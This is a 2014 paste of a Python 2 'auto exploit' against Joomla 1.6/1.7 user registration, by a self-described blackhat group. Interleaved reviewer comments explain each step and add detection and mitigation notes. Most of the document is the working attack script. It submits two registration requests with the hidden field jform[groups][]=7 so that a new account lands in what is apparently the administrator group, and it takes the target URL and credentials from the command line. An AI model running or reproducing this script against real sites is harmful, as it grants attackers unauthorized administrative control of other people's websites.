joomla auto exploit

a guest
Sep 9th, 2014
  1. #!/usr/bin/python
  2. # Joomla Com_User Auto Exploit
  3. # By xSecurity
  4. # Modif Sign by SunDi3yansyah | Surabaya Blackhat
  5.  
  6. import requests as sec4ever, re, urllib, sys, os
  7. from threading import Thread
  8. from time import sleep
  # cls(): clear the terminal. The list ['clear','cls'] is indexed with the
  # boolean os.name == 'nt', so Windows runs `cls` and every other platform
  # runs `clear`. The command is a fixed literal; no caller input reaches
  # os.system here.
  # NOTE(review): the paste lost its indentation; the next line is the body.
  9. def cls():
  10. os.system(['clear','cls'][os.name =='nt'])
  11.  
  # Start-up: clear the screen, then print the banner below. `print '''...'''`
  # is a Python 2 print statement, so this file is Python 2 only.
  # The banner states the scope of the script: Joomla 1.6 / 1.7, com_users.
  12. cls()
  13. print '''
  14. ____ _ ____ _ _ _ _
  15. / ___| _ _ _ __ __ _| |__ __ _ _ _ __ _ | __ )| | __ _ ___| | _| |__ __ _| |_
  16. \___ \| | | | '__/ _` | '_ \ / _` | | | |/ _` | | _ \| |/ _` |/ __| |/ / '_ \ / _` | __|
  17. ___) | |_| | | | (_| | |_) | (_| | |_| | (_| | | |_) | | (_| | (__| <| | | | (_| | |_
  18. |____/ \__,_|_| \__,_|_.__/ \__,_|\__, |\__,_| |____/|_|\__,_|\___|_|\_\_| |_|\__,_|\__|
  19. |___/
  20. _ _
  21. | _ _.._._ _|_ _ |_) _ |_) __|__|_ _ ._
  22. |_(/_(_|| | | |_(_) |_)(/_ |_)(/_|_ |_(/_|
  23. ---------------------------------------------------------------------
  24. Joomla Version [1.6|1.7] [Com_User] Auto Exploit
  25. Require Need Install Requests Python Package (Cari di google)
  26. --------------------------------------------------------------
  27. Surabaya Blackhat | Surabaya Hackerlink | Yogyakarta Blackhat
  28. --------------------------------------------------------------
  29. Please wait...'''
  30.  
  # pwd2 is a fixed string that one() sends as jform[password2], so that the
  # first submission's two password fields do not match.
  # NOTE(review): the value is constant across runs of this script, but it only
  # helps detection where request bodies are captured (proxy/WAF body logging);
  # ordinary access logs will not contain it.
  31. pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
  # one(): first of two registration submissions, sent with MISMATCHED
  # passwords (password1 = pwd1, password2 = pwd2).
  #   target - base URL of the site; the paths below are appended to it
  #   pwd1   - password chosen on the command line
  #   pwd2   - value sent as the confirmation password
  #   email  - address used for both e-mail fields
  # Returns None. The responses x1, p1 and x2 are stored but never inspected.
  # NOTE(review): the stock registration form is not expected to submit
  # jform[groups][]; a registration POST that carries it is the
  # defender-relevant signal in this function.
  32. def one(target,pwd1,pwd2,email):
  33. # Wrong Password
  34. x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
  # The name of the first hidden input whose value is "1" is used as the form token.
  35. token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
  36. post = {}
  37. post["jform[name]"] = 'SunDi3yansyah'
  # `user` is not a parameter; it resolves to the module-level name set from sys.argv.
  38. post["jform[username]"] = user
  39. post["jform[password1]"] = pwd1
  40. post["jform[password2]"] = pwd2
  41. post["jform[email1]"] = email
  42. post["jform[email2]"] = email
  # Client-supplied user-group id. 7 is presumably the Administrator group of a
  # default Joomla install - confirm against the site's user-group table.
  # A registration handler should ignore or reject this field.
  43. post["jform[groups][]"] = "7"
  44. post["option"] = "com_users"
  45. post["task"] = "registration.register"
  46. post[token[0]] = "1"
  47. p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  48. x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
  49.  
  # exploit(): second registration submission, identical to one() except that
  # both password fields carry pwd1, so they match. The pwd2 parameter is
  # accepted but not used in this function.
  # Returns None. The responses x3, p2 and x4 are stored but never inspected.
  # NOTE(review): presumably the technique depends on form data from the failed
  # first submission surviving in the server-side session - confirm against the
  # vendor advisory for the affected releases.
  # Detection: two POSTs to option=com_users&view=registration on one session
  # cookie, each carrying jform[groups][], each followed by a GET of
  # ?view=registration&layout=complete.
  # Mitigation: run a Joomla release whose registration handler discards
  # client-supplied groups, or disable self-registration; audit accounts in
  # privileged groups that were created through registration.
  50. def exploit(target,pwd1,pwd2,email):
  51. # Passwords match in this request; the 'Wrong Password' label applied to one()
  52. x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
  # A fresh token field name is read from the newly fetched form.
  53. token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
  54. post = {}
  55. post["jform[name]"] = 'SunDi3yansyah'
  # `user` comes from module scope, not from the parameter list.
  56. post["jform[username]"] = user
  57. post["jform[password1]"] = pwd1
  58. post["jform[password2]"] = pwd1
  59. post["jform[email1]"] = email
  60. post["jform[email2]"] = email
  # Same client-supplied group id as in one(); see the detection note above.
  61. post["jform[groups][]"] = "7"
  62. post["option"] = "com_users"
  63. post["task"] = "registration.register"
  64. post[token[0]] = "1"
  65. p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  66. x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
  67.  
  # One shared requests session (requests is imported as sec4ever), so cookies
  # set by the site persist across every request made in one() and exploit().
  68. xsec = sec4ever.session()
  # Exactly four command-line arguments are required: base URL, username,
  # password, e-mail. Anything else prints the usage line.
  69. if len(sys.argv) == 5:
  70. target = sys.argv[1]
  # `user` is read by one() and exploit() as a module-level name.
  71. user = sys.argv[2]
  72. pwd1 = sys.argv[3]
  73. email = sys.argv[4]
  # pwd2 here is the module-level constant defined above.
  74. one(target,pwd1,pwd2,email)
  # exploit() has no return statement, so ex is always None; the script never
  # checks whether either registration was accepted.
  75. ex = exploit(target,pwd1,pwd2,email)
  # The message tells the operator to activate the account by e-mail, so the
  # address must be one they can read; it echoes the password in clear text.
  76. print ' * Go To Your Email & Active Then Login \n * Username: '+user+' & Password: '+pwd1
  77. else:
  78. print "Usage: python tool.py http://target.com/ youruser yourpass yourmail"